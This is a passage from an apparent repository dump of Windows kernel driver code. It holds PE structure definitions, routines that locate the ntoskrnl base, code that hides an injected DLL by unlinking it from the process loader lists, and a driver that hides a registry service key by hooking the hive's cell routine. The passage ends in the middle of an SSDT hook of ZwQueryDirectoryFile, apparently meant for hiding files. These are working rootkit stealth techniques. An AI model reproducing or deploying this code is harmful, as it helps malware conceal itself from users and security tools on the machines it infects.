Overlay number 106 | WORD e_res[4]; // Reserved words 107 | WORD e_oemid; // OEM identifier (for e_oeminfo) 108 | WORD e_oeminfo; // OEM information; e_oemid specific 109 | WORD e_res2[10]; // Reserved words 110 | LONG e_lfanew; // File address of new exe header 111 | } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; 112 | 113 | 114 | typedef struct _IMAGE_DATA_DIRECTORY { 115 | DWORD VirtualAddress; 116 | DWORD Size; 117 | } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; 118 | #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16 119 | 120 | typedef struct _IMAGE_OPTIONAL_HEADER { 121 | // 122 | // Standard fields. 123 | // 124 | 125 | WORD Magic; 126 | BYTE MajorLinkerVersion; 127 | BYTE MinorLinkerVersion; 128 | DWORD SizeOfCode; 129 | DWORD SizeOfInitializedData; 130 | DWORD SizeOfUninitializedData; 131 | DWORD AddressOfEntryPoint; 132 | DWORD BaseOfCode; 133 | DWORD BaseOfData; 134 | 135 | // 136 | // NT additional fields. 137 | // 138 | 139 | DWORD ImageBase; 140 | DWORD SectionAlignment; 141 | DWORD FileAlignment; 142 | WORD MajorOperatingSystemVersion; 143 | WORD MinorOperatingSystemVersion; 144 | WORD MajorImageVersion; 145 | WORD MinorImageVersion; 146 | WORD MajorSubsystemVersion; 147 | WORD MinorSubsystemVersion; 148 | DWORD Win32VersionValue; 149 | DWORD SizeOfImage; 150 | DWORD SizeOfHeaders; 151 | DWORD CheckSum; 152 | WORD Subsystem; 153 | WORD DllCharacteristics; 154 | DWORD SizeOfStackReserve; 155 | DWORD SizeOfStackCommit; 156 | DWORD SizeOfHeapReserve; 157 | DWORD SizeOfHeapCommit; 158 | DWORD LoaderFlags; 159 | DWORD NumberOfRvaAndSizes; 160 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; 161 | } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; 162 | 163 | typedef IMAGE_OPTIONAL_HEADER32 IMAGE_OPTIONAL_HEADER; 164 | typedef PIMAGE_OPTIONAL_HEADER32 PIMAGE_OPTIONAL_HEADER; 165 | 166 | typedef struct _IMAGE_THUNK_DATA32 { 167 | union { 168 | DWORD ForwarderString; // PBYTE 169 | DWORD Function; // PDWORD 170 | DWORD Ordinal; 171 | DWORD AddressOfData; // PIMAGE_IMPORT_BY_NAME 172 | } u1; 173 | } IMAGE_THUNK_DATA32; 174 | typedef IMAGE_THUNK_DATA32 * PIMAGE_THUNK_DATA32; 175 | typedef IMAGE_THUNK_DATA32 IMAGE_THUNK_DATA; 176 | typedef PIMAGE_THUNK_DATA32 PIMAGE_THUNK_DATA; 177 | 178 | typedef struct _IMAGE_IMPORT_DESCRIPTOR { 179 | union { 180 | DWORD Characteristics; // 0 for terminating null import descriptor 181 | DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) 182 | }; 183 | DWORD TimeDateStamp; // 0 if not bound, 184 | // -1 if bound, and real date\time stamp 185 | // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) 186 | // O.W. date/time stamp of DLL bound to (Old BIND) 187 | 188 | DWORD ForwarderChain; // -1 if no forwarders 189 | DWORD Name; 190 | DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) 191 | } IMAGE_IMPORT_DESCRIPTOR; 192 | typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR; 193 | 194 | 195 | typedef struct _IMAGE_EXPORT_DIRECTORY { 196 | DWORD Characteristics; 197 | DWORD TimeDateStamp; 198 | WORD MajorVersion; 199 | WORD MinorVersion; 200 | DWORD Name; 201 | DWORD Base; 202 | DWORD NumberOfFunctions; 203 | DWORD NumberOfNames; 204 | DWORD AddressOfFunctions; // RVA from base of image 205 | DWORD AddressOfNames; // RVA from base of image 206 | DWORD AddressOfNameOrdinals; // RVA from base of image 207 | } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; 208 | 209 | 210 | #define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory 211 | #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 212 | 213 | typedef unsigned char *PBYTE; 214 | 215 | typedef struct _GENERATE_NAME_CONTEXT { 216 | USHORT Checksum; 217 | BOOLEAN CheckSumInserted; 218 | UCHAR NameLength; 219 | WCHAR NameBuffer[8]; 220 | ULONG ExtensionLength; 221 | WCHAR ExtensionBuffer[4]; 222 | ULONG LastIndexValue; 223 | } GENERATE_NAME_CONTEXT, *PGENERATE_NAME_CONTEXT; 224 | 225 | 226 | typedef struct _IMAGE_FILE_HEADER { 227 | WORD Machine; 228 | WORD NumberOfSections; 229 | DWORD TimeDateStamp; 230 | DWORD PointerToSymbolTable; 231 | DWORD NumberOfSymbols; 232 | WORD SizeOfOptionalHeader; 233 | WORD Characteristics; 234 | } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; 235 | 236 | #define SEC_IMAGE 0x01000000 237 | #define SEC_BASED 0x00200000 238 | typedef struct _SECTION_IMAGE_INFORMATION { 239 | PVOID EntryPoint; 240 | ULONG StackZeroBits; 241 | ULONG StackReserved; 242 | ULONG StackCommit; 243 | ULONG ImageSubsystem; 244 | WORD SubsystemVersionLow; 245 | WORD SubsystemVersionHigh; 246 | ULONG Unknown1; 247 | ULONG ImageCharacteristics; 248 | ULONG ImageMachineType; 249 | ULONG Unknown2[3]; 250 | } SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; 251 | 252 | 253 | NTSYSAPI 254 | NTSTATUS 255 | NTAPI 256 | ZwCreateSection( 257 | OUT PHANDLE SectionHandle, 258 | IN ACCESS_MASK DesiredAccess, 259 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 260 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 261 | IN ULONG SectionPageProtection, 262 | IN ULONG AllocationAttributes, 263 | IN HANDLE FileHandle OPTIONAL 264 | ); 265 | 266 | #endif 267 | -------------------------------------------------------------------------------- /EAT Hook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /EAT Hook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=EDTHook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /GetNtoskrnlexe/ByZwQuerySystemInformation.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "windef.h" 3 | 4 | typedef enum _SYSTEM_INFORMATION_CLASS { 5 | SystemBasicInformation, 6 | SystemProcessorInformation, 7 | SystemPerformanceInformation, 8 | SystemTimeOfDayInformation, 9 | SystemPathInformation, 10 | SystemProcessInformation, 11 | SystemCallCountInformation, 12 | SystemDeviceInformation, 13 | SystemProcessorPerformanceInformation, 14 | SystemFlagsInformation, 15 | SystemCallTimeInformation, 16 | SystemModuleInformation, 17 | SystemLocksInformation, 18 | SystemStackTraceInformation, 19 | SystemPagedPoolInformation, 20 | SystemNonPagedPoolInformation, 21 | SystemHandleInformation, 22 | SystemObjectInformation, 23 | SystemPageFileInformation, 24 | SystemVdmInstemulInformation, 25 | SystemVdmBopInformation, 26 | SystemFileCacheInformation, 27 | SystemPoolTagInformation, 28 | SystemInterruptInformation, 29 | SystemDpcBehaviorInformation, 30 | SystemFullMemoryInformation, 31 | SystemLoadGdiDriverInformation, 32 | SystemUnloadGdiDriverInformation, 33 | SystemTimeAdjustmentInformation, 34 | SystemSummaryMemoryInformation, 35 | SystemNextEventIdInformation, 36 | SystemEventIdsInformation, 37 | SystemCrashDumpInformation, 38 | SystemExceptionInformation, 39 | SystemCrashDumpStateInformation, 40 | SystemKernelDebuggerInformation, 41 | SystemContextSwitchInformation, 42 | SystemRegistryQuotaInformation, 43 | SystemExtendServiceTableInformation, 44 | SystemPrioritySeperation, 45 | SystemPlugPlayBusInformation, 46 | SystemDockInformation, 47 | SystemPowerInformation2, 48 | SystemProcessorSpeedInformation, 49 | SystemCurrentTimeZoneInformation, 50 | SystemLookasideInformation 51 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 52 | 53 | typedef struct _SYSTEM_MODULE_INFORMATION 54 | { 55 | HANDLE Section; 56 | PVOID MappedBase; 57 | PVOID Base; 58 | ULONG Size; 59 | ULONG Flags; 60 | USHORT Index; 61 | USHORT Unknown; 62 | USHORT LoadCount; 63 | USHORT ModuleNameOffset; 64 | CHAR ImageName[256]; 65 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 66 | 67 | typedef struct _SysModuleList 68 | { 69 | ULONG Count; 70 | SYSTEM_MODULE_INFORMATION smi[1]; 71 | } SystemModuleList, *PSystemModuleList; 72 | 73 | NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( 74 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 75 | IN PVOID SystemInformation, 76 | IN ULONG SystemInformationLength, 77 | OUT PULONG ReturnLength); 78 | 79 | void GetBaseImageOfNtoskrnl() 80 | { 81 | ULONG length = 0, i; 82 | PSystemModuleList info = NULL; 83 | PSYSTEM_MODULE_INFORMATION modules; 84 | ZwQuerySystemInformation(SystemModuleInformation, NULL, 0, &length); 85 | if (length == 0) 86 | { 87 | DbgPrint("Get length error!\n"); 88 | return; 89 | } 90 | info = ExAllocatePool(NonPagedPool, length); 91 | if (info == NULL) 92 | { 93 | DbgPrint("ExAllocatePool error!\n"); 94 | return; 95 | } 96 | ZwQuerySystemInformation(SystemModuleInformation, info, length, NULL); 97 | 98 | modules = (PSYSTEM_MODULE_INFORMATION)((PULONG)info + 1); 99 | for (i=0; iCount; i++) 100 | { 101 | DbgPrint("module name %d: %s with 0x%p offset %d\n", i, modules->ImageName, modules->Base, modules->ModuleNameOffset); 102 | modules++; 103 | } 104 | ExFreePool(info); 105 | } 106 | 107 | void Unload(PDRIVER_OBJECT driver) 108 | { 109 | DbgPrint("Unload!\n"); 110 | } 111 | 112 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 113 | { 114 | DbgPrint("DriverEntry!\n"); 115 | 116 | GetBaseImageOfNtoskrnl(); 117 | driver->DriverUnload = Unload; 118 | return STATUS_SUCCESS; 119 | } -------------------------------------------------------------------------------- /GetNtoskrnlexe/FindDirect.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | extern NTKERNELAPI PVOID MmSystemRangeStart; 4 | 5 | ULONG FindBase(ULONG need) 6 | { 7 | ULONG start, temp, now; 8 | __asm 9 | { 10 | mov eax,MmSystemRangeStart; 11 | mov eax,[eax]; 12 | mov eax,[eax]; 13 | mov start, eax; 14 | } 15 | if (need >= start) 16 | { 17 | need = need & (!(PAGE_SIZE - 1)); 18 | temp = (need - start) >> PAGE_SHIFT; 19 | while (temp--) 20 | { 21 | if (MmIsAddressValid(need)) 22 | { 23 | now = *(PULONG*)need; 24 | if (now == 0x00905A4D) 25 | { 26 | return now; 27 | } 28 | } 29 | need -= PAGE_SIZE; 30 | } 31 | } 32 | } 33 | 34 | void Unload(DRIVER_OBJECT driver) 35 | { 36 | DbgPrint("Unload!\n"); 37 | } 38 | 39 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING) 40 | { 41 | PULONG AddressOfRet; 42 | ULONG Ret = 0; 43 | 44 | DbgPrint("DriverEntry!\n"); 45 | driver->DriverUnload = Unload; 46 | 47 | __asm 48 | { 49 | lea ecx, [ebp+4]; 50 | mov AddressOfRet, ecx; 51 | } 52 | if (!MmIsAddressValid(AddressOfRet)) 53 | { 54 | DbgPrint("AddressOfRet error!\n"); 55 | return STATUS_SUCCESS; 56 | } 57 | 58 | Ret = FindBase(*AddressOfRet); 59 | 60 | if (!Ret) 61 | { 62 | DbgPrint("Cannot find base address of ntoskrnl.exe!\n"); 63 | } else 64 | { 65 | DbgPrint("Base %p\n", Ret); 66 | } 67 | return STATUS_SUCCESS; 68 | } -------------------------------------------------------------------------------- /GetNtoskrnlexe/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /GetNtoskrnlexe/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=GetNtoskrnlexe 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=ByZwQuerySystemInformation.c 14 | -------------------------------------------------------------------------------- /HideDll/HideDllInMMVAD.c: -------------------------------------------------------------------------------- 1 | VOID ShowModules(DWORD Pid) 2 | { 3 | ULONG VAD; 4 | PEPROCESS TargetProcess; 5 | PsLookupProcessByProcessId( (HANDLE)Pid,TargetProcess); 6 | if(!TargetProcess) 7 | { 8 | DbgPrint("[EnumModules] Error on Get EProcess By Pid."); 9 | return; 10 | } 11 | VAD = *(ULONG *)((ULONG)TargetProcess + VadOffset); 12 | DbgPrint("[EnumModules] EPROCESS : 0x%X , VAD : 0x%X",TargetProcess,VAD); 13 | 14 | PreOrderTraverse(VAD); 15 | DbgPrint("[EnumModules] Modules count : %d",nCount); 16 | } 17 | 18 | VOID PreOrderTraverse(ULONG mmVad) 19 | { 20 | if ( MmIsAddressValid( (ULONG *)mmVad ) ) 21 | { 22 | ShowPath(mmVad); 23 | PreOrderTraverse( *(ULONG *)(mmVad + LeftChild) ); 24 | PreOrderTraverse( *(ULONG *)(mmVad + RightChild) ); 25 | } 26 | } 27 | 28 | VOID ShowPath(ULONG mmVad) 29 | { 30 | PUNICODE_STRING pPath; 31 | ULONG ca; 32 | ULONG fp; 33 | ca = *(ULONG *)(mmVad + ControlArea); 34 | if( !MmIsAddressValid( (ULONG *)ca ) ) 35 | { 36 | DbgPrint("[EnumModules] ControlArea is not available : 0x%X",ca); 37 | return; 38 | } 39 | fp = *(ULONG *)(ca + FilePointer); 40 | if( !MmIsAddressValid( (ULONG *)fp ) ) 41 | { 42 | DbgPrint("[EnumModules] FileObject is not available : 0x%X",fp); 43 | return; 44 | } 45 | pPath = (PUNICODE_STRING)(fp + FileName); 46 | DbgPrint("[EnumModules] The file name is %S",pPath->Buffer); 47 | nCount++; 48 | } -------------------------------------------------------------------------------- /HideDll/main.c: -------------------------------------------------------------------------------- 1 | typedef ULONG (*pfnNtQueryInformationProcess)(); 2 | 3 | typedef struct _LDR_DATA_TABLE_ENTRY 4 | { 5 | LIST_ENTRY InLoadOrderLinks; 6 | LIST_ENTRY InMemoryOrderModuleList; 7 | LIST_ENTRY InInitializationOrderModuleList; 8 | PVOID DllBase; 9 | PVOID EntryPoint; 10 | ULONG SizeOfImage; 11 | UNICODE_STRING FullDllName; 12 | UNICODE_STRING BaseDllName; 13 | ULONG Flags; 14 | USHORT LoadCount; 15 | USHORT TlsIndex; 16 | union 17 | { 18 | LIST_ENTRY HashLinks; 19 | PVOID SectionPointer; 20 | }; 21 | ULONG CheckSum; 22 | union 23 | { 24 | ULONG TimeDateStamp; 25 | PVOID LoadedImports; 26 | }; 27 | PVOID EntryPointActivationContext; 28 | PVOID PatchInformation; 29 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 30 | 31 | 32 | BOOL HideMyself() 33 | { 34 | HMODULE hMod = GetModuleHandle( _T( "ntdll.dll")); 35 | HMODULE hModMyself = GetModuleHandle( _T("dll.dll")); 36 | pfnNtQueryInformationProcess p = (pfnNtQueryInformationProcess)::GetProcAddress( hMod, "NtQueryInformationProcess"); 37 | 38 | PROCESS_BASIC_INFORMATION stInfo = {0}; 39 | DWORD dwRetnLen = 0; 40 | DWORD dw = p( GetCurrentProcess(), 0, &stInfo, sizeof(stInfo), &dwRetnLen); 41 | 42 | PPEB pPeb = stInfo.PebBaseAddress; 43 | PLIST_ENTRY ListHead, Current; 44 | PLDR_DATA_TABLE_ENTRY pstEntry = NULL; 45 | 46 | ListHead = &( stInfo.PebBaseAddress->Ldr->InLoadOrderModuleList); 47 | Current = ListHead->Flink; 48 | while ( Current != ListHead) 49 | { 50 | pstEntry = CONTAINING_RECORD( Current, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks); 51 | //DebugOutW( L"Module:%s, base:0x%X\r\n", pstEntry->FullDllName.Buffer, pstEntry->EntryPoint); 52 | if ( pstEntry->DllBase == hModMyself) 53 | { 54 | pstEntry->InLoadOrderLinks.Flink->Blink = pstEntry->InLoadOrderLinks.Blink; 55 | pstEntry->InLoadOrderLinks.Blink->Flink = pstEntry->InLoadOrderLinks.Flink; 56 | DebugOut( _T( "Hide injected dll.")); 57 | break; 58 | } 59 | Current = pstEntry->InLoadOrderLinks.Flink; 60 | } 61 | 62 | ListHead = &( stInfo.PebBaseAddress->Ldr->InMemoryOrderModuleList); 63 | Current = ListHead->Flink; 64 | while ( Current != ListHead) 65 | { 66 | pstEntry = CONTAINING_RECORD( Current, LDR_DATA_TABLE_ENTRY, InMemoryOrderModuleList); 67 | DebugOutW( L"Module:%s, base:0x%X\r\n", pstEntry->FullDllName.Buffer, pstEntry->EntryPoint); 68 | if ( pstEntry->DllBase == hModMyself) 69 | { 70 | pstEntry->InMemoryOrderModuleList.Flink->Blink = pstEntry->InMemoryOrderModuleList.Blink; 71 | pstEntry->InMemoryOrderModuleList.Blink->Flink = pstEntry->InMemoryOrderModuleList.Flink; 72 | DebugOut( _T( "Hide injected dll.")); 73 | break; 74 | } 75 | Current = pstEntry->InMemoryOrderModuleList.Flink; 76 | } 77 | DebugOutW( L"\r\n"); 78 | 79 | ListHead = &( stInfo.PebBaseAddress->Ldr->InInitializationOrderModuleList); 80 | Current = ListHead->Flink; 81 | while ( Current != ListHead) 82 | { 83 | pstEntry = CONTAINING_RECORD( Current, LDR_DATA_TABLE_ENTRY, InInitializationOrderModuleList); 84 | DebugOutW( L"Module:%s, base:0x%X\r\n", pstEntry->FullDllName.Buffer, pstEntry->EntryPoint); 85 | if ( pstEntry->DllBase == hModMyself) 86 | { 87 | pstEntry->InInitializationOrderModuleList.Flink->Blink = pstEntry->InInitializationOrderModuleList.Blink; 88 | pstEntry->InInitializationOrderModuleList.Blink->Flink = pstEntry->InInitializationOrderModuleList.Flink; 89 | DebugOut( _T( "Hide injected dll.")); 90 | break; 91 | } 92 | Current = pstEntry->InInitializationOrderModuleList.Flink; 93 | } 94 | //DebugOut( _T("Out HideMyself\r\n")); 95 | return TRUE; 96 | } -------------------------------------------------------------------------------- /HideDll/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /HideDll/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=HideDll 3 | TARGETPATH=obj 4 | TARGETTYPE= 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES= 14 | -------------------------------------------------------------------------------- /HideReg.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | #define GET_PTR(ptr, offset) \ 4 | ( *(PVOID*)( (ULONG)ptr + (offset##Offset) )) 5 | 6 | #define CM_KEY_INDEX_ROOT 0x6972 7 | #define CM_KEY_INDEX_LEAF 0x696C 8 | #define CM_KEY_FAST_LEAF 0x666C 9 | #define CM_KEY_HASH_LEAF 0x686C 10 | 11 | #pragma pack(1) 12 | typedef struct _CM_KEY_NODE { 13 | USHORT Signature; 14 | USHORT Flags; 15 | LARGE_INTEGER LastWriteTime; 16 | ULONG Spare; // used to be TitleIndex 17 | HANDLE Parent; 18 | ULONG SubKeyCounts[2]; // Stable and Volatile 19 | HANDLE SubKeyLists[2]; // Stable and Volatile 20 | // ... 21 | } CM_KEY_NODE, *PCM_KEY_NODE; 22 | 23 | typedef struct _CM_KEY_INDEX { 24 | USHORT Signature; 25 | USHORT Count; 26 | HANDLE List[1]; 27 | } CM_KEY_INDEX, *PCM_KEY_INDEX; 28 | 29 | typedef struct _CM_KEY_BODY { 30 | ULONG Type; // "ky02" 31 | PVOID KeyControlBlock; 32 | PVOID NotifyBlock; 33 | PEPROCESS Process; // the owner process 34 | LIST_ENTRY KeyBodyList; // key_nodes using the same kcb 35 | } CM_KEY_BODY, *PCM_KEY_BODY; 36 | 37 | typedef PVOID (__stdcall *PGET_CELL_ROUTINE)(PVOID, HANDLE); 38 | 39 | typedef struct _HHIVE { 40 | ULONG Signature; 41 | PGET_CELL_ROUTINE GetCellRoutine; 42 | // ... 43 | } HHIVE, *PHHIVE; 44 | #pragma pack() 45 | 46 | WCHAR g_HideKeyName[] = L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\Beep"; 47 | 48 | PGET_CELL_ROUTINE g_pGetCellRoutine = NULL; 49 | PGET_CELL_ROUTINE* g_ppGetCellRoutine = NULL; 50 | 51 | PCM_KEY_NODE g_HideNode = NULL; 52 | PCM_KEY_NODE g_LastNode = NULL; 53 | 54 | HANDLE OpenKeyByName(PCWSTR pwcsKeyName) 55 | { 56 | NTSTATUS status; 57 | UNICODE_STRING uKeyName; 58 | OBJECT_ATTRIBUTES oa; 59 | HANDLE hKey; 60 | RtlInitUnicodeString(&uKeyName, pwcsKeyName); 61 | InitializeObjectAttributes(&oa, 62 | &uKeyName, 63 | OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 64 | NULL, 65 | NULL); 66 | status = ZwOpenKey(&hKey, KEY_READ, &oa); 67 | if (status != STATUS_SUCCESS) 68 | { 69 | DbgPrint("ZwOpenKey failed\n"); 70 | return NULL; 71 | } 72 | return hKey; 73 | } 74 | 75 | PVOID GetKeyControlBlock(HANDLE hKey) 76 | { 77 | NTSTATUS status; 78 | PCM_KEY_BODY KeyBody; 79 | PVOID kcb; 80 | 81 | if (hKey == NULL) 82 | return NULL; 83 | 84 | status = ObReferenceObjectByHandle(hKey, 85 | KEY_READ, 86 | NULL, 87 | KernelMode, 88 | &KeyBody, 89 | NULL); 90 | if (status != STATUS_SUCCESS) 91 | { 92 | DbgPrint("ObreferencedObjectByHandle Failed\n"); 93 | return NULL; 94 | } 95 | 96 | kcb = KeyBody->KeyControlBlock; 97 | ObDereferenceObject(KeyBody); 98 | return kcb; 99 | } 100 | 101 | PVOID GetLastKeyNode(PVOID Hive, PCM_KEY_NODE Node) 102 | { 103 | PCM_KEY_NODE ParentNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, Node->Parent); 104 | PCM_KEY_INDEX Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, ParentNode->SubKeyLists[0]); 105 | 106 | DbgPrint("ParentNode = %lx\nIndex = %lx\n", ParentNode, Index); 107 | 108 | if (Index->Signature == CM_KEY_INDEX_ROOT) 109 | { 110 | Index = (PCM_KEY_INDEX)g_pGetCellRoutine(Hive, Index->List[Index->Count - 1]); 111 | DbgPrint("Index = %lx\n", Index); 112 | } 113 | 114 | if (Index->Signature == CM_KEY_FAST_LEAF || Index->Signature == CM_KEY_HASH_LEAF) 115 | { 116 | return g_pGetCellRoutine(Hive, Index->List[2*(Index->Count-1)]); 117 | } 118 | else 119 | { 120 | return g_pGetCellRoutine(Hive, Index->List[Index->Count-1]); 121 | } 122 | } 123 | 124 | PVOID MyGetCellRoutine(PVOID Hive, HANDLE Cell) 125 | { 126 | PVOID pRet = g_pGetCellRoutine(Hive, Cell); 127 | if (pRet) 128 | { 129 | if (pRet == g_HideNode) 130 | { 131 | DbgPrint("GetCellRoutine(%lx, %08lx) == %lx\n", Hive, Cell, pRet); 132 | pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode(Hive, g_HideNode); 133 | DbgPrint("g_LastNode = %lx\n", g_LastNode); 134 | if (pRet == g_HideNode) pRet = NULL; 135 | } 136 | else if (pRet == g_LastNode) 137 | { 138 | DbgPrint("GetCellRoutine(%lx, %08lx) == %lx\n", Hive, Cell, pRet); 139 | pRet = g_LastNode = NULL; 140 | } 141 | } 142 | return pRet; 143 | } 144 | 145 | NTSTATUS DriverUnload(PDRIVER_OBJECT pDrvObj) 146 | { 147 | DbgPrint("DriverUnload()\n"); 148 | if (g_ppGetCellRoutine) 149 | *g_ppGetCellRoutine = g_pGetCellRoutine; 150 | return STATUS_SUCCESS; 151 | } 152 | 153 | NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath) 154 | { 155 | ULONG BuildNumber; 156 | ULONG KeyHiveOffset; // KeyControlBlock->KeyHive 157 | ULONG KeyCellOffset; // KeyControlBlock->KeyCell 158 | HANDLE hKey; 159 | PVOID KCB, Hive; 160 | 161 | DbgPrint("DriverEntry()\n"); 162 | pDrvObj->DriverUnload = DriverUnload; 163 | 164 | if (PsGetVersion(NULL, NULL, &BuildNumber, NULL)) 165 | return STATUS_NOT_SUPPORTED; 166 | DbgPrint("BuildNumber = %d\n", BuildNumber); 167 | 168 | switch (BuildNumber) 169 | { 170 | case 2195: // Win2000 171 | KeyHiveOffset = 0xc; 172 | KeyCellOffset = 0x10; 173 | break; 174 | case 2600: // WinXP 175 | case 3790: // Win2003 176 | KeyHiveOffset = 0x10; 177 | KeyCellOffset = 0x14; 178 | break; 179 | default: 180 | return STATUS_NOT_SUPPORTED; 181 | } 182 | 183 | 184 | hKey = OpenKeyByName(g_HideKeyName); 185 | KCB = GetKeyControlBlock(hKey); 186 | if (KCB) 187 | { 188 | PHHIVE Hive = (PHHIVE)GET_PTR(KCB, KeyHive); 189 | g_ppGetCellRoutine = &Hive->GetCellRoutine; 190 | g_pGetCellRoutine = Hive->GetCellRoutine; 191 | DbgPrint("GetCellRoutine = %lx\n", g_pGetCellRoutine); 192 | g_HideNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, GET_PTR(KCB, KeyCell)); 193 | Hive->GetCellRoutine = MyGetCellRoutine; 194 | } 195 | ZwClose(hKey); 196 | 197 | return STATUS_SUCCESS; 198 | } 199 | -------------------------------------------------------------------------------- /HookNtCreateSectionProtectProcess.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/HookNtCreateSectionProtectProcess.c -------------------------------------------------------------------------------- /HookZwQueryDirectoryFile/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | typedef unsigned int DWORD; 4 | typedef unsigned short WORD; 5 | typedef unsigned char BYTE; 6 | typedef DWORD* PDWORD; 7 | typedef BYTE* PBYTE; 8 | typedef WORD* PWORD; 9 | 10 | PVOID* NewSystemCallTable; 11 | PMDL MyMDL; 12 | 13 | #define INDEX(func) *(PULONG)((PUCHAR)func + 1) 14 | #define HOOK(func, newfunc, old) \ 15 | old = (PVOID)InterlockedExchange( (PULONG)&NewSystemCallTable[INDEX(func)], (ULONG)newfunc) 16 | #define UNHOOK(func, old) \ 17 | InterlockedExchange( (PULONG)&NewSystemCallTable[INDEX(func)], (ULONG)old) 18 | 19 | #pragma pack(1) 20 | typedef struct _KeServiceDescriptorEntry { 21 | PDWORD ServiceTableEntry; 22 | PDWORD ServiceCounterTableBase; 23 | DWORD NumberOfServices; 24 | PBYTE ParamTableBase; 25 | } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; 26 | #pragma pack() 27 | __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; 28 | 29 | typedef struct _FILE_BOTH_DIR_INFORMATION { 30 | ULONG NextEntryOffset; 31 | ULONG FileIndex; 32 | LARGE_INTEGER CreationTime; 33 | LARGE_INTEGER LastAccessTime; 34 | LARGE_INTEGER LastWriteTime; 35 | LARGE_INTEGER ChangeTime; 36 | LARGE_INTEGER EndOfFile; 37 | LARGE_INTEGER AllocationSize; 38 | ULONG FileAttributes; 39 | ULONG FileNameLength; 40 | ULONG EaSize; 41 | CCHAR ShortNameLength; 42 | WCHAR ShortName[12]; 43 | WCHAR FileName[1]; 44 | } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; 45 | 46 | NTSYSAPI 47 | NTSTATUS 48 | NTAPI ZwQueryDirectoryFile( 49 | IN HANDLE FileHandle, 50 | IN HANDLE Event OPTIONAL, 51 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 52 | IN PVOID ApcContext OPTIONAL, 53 | OUT PIO_STATUS_BLOCK IoStatusBlock, 54 | OUT PVOID FileInformation, 55 | IN ULONG Length, 56 | IN FILE_INFORMATION_CLASS FileInformationClass, 57 | IN BOOLEAN ReturnSingleEntry, 58 | IN PUNICODE_STRING FileName 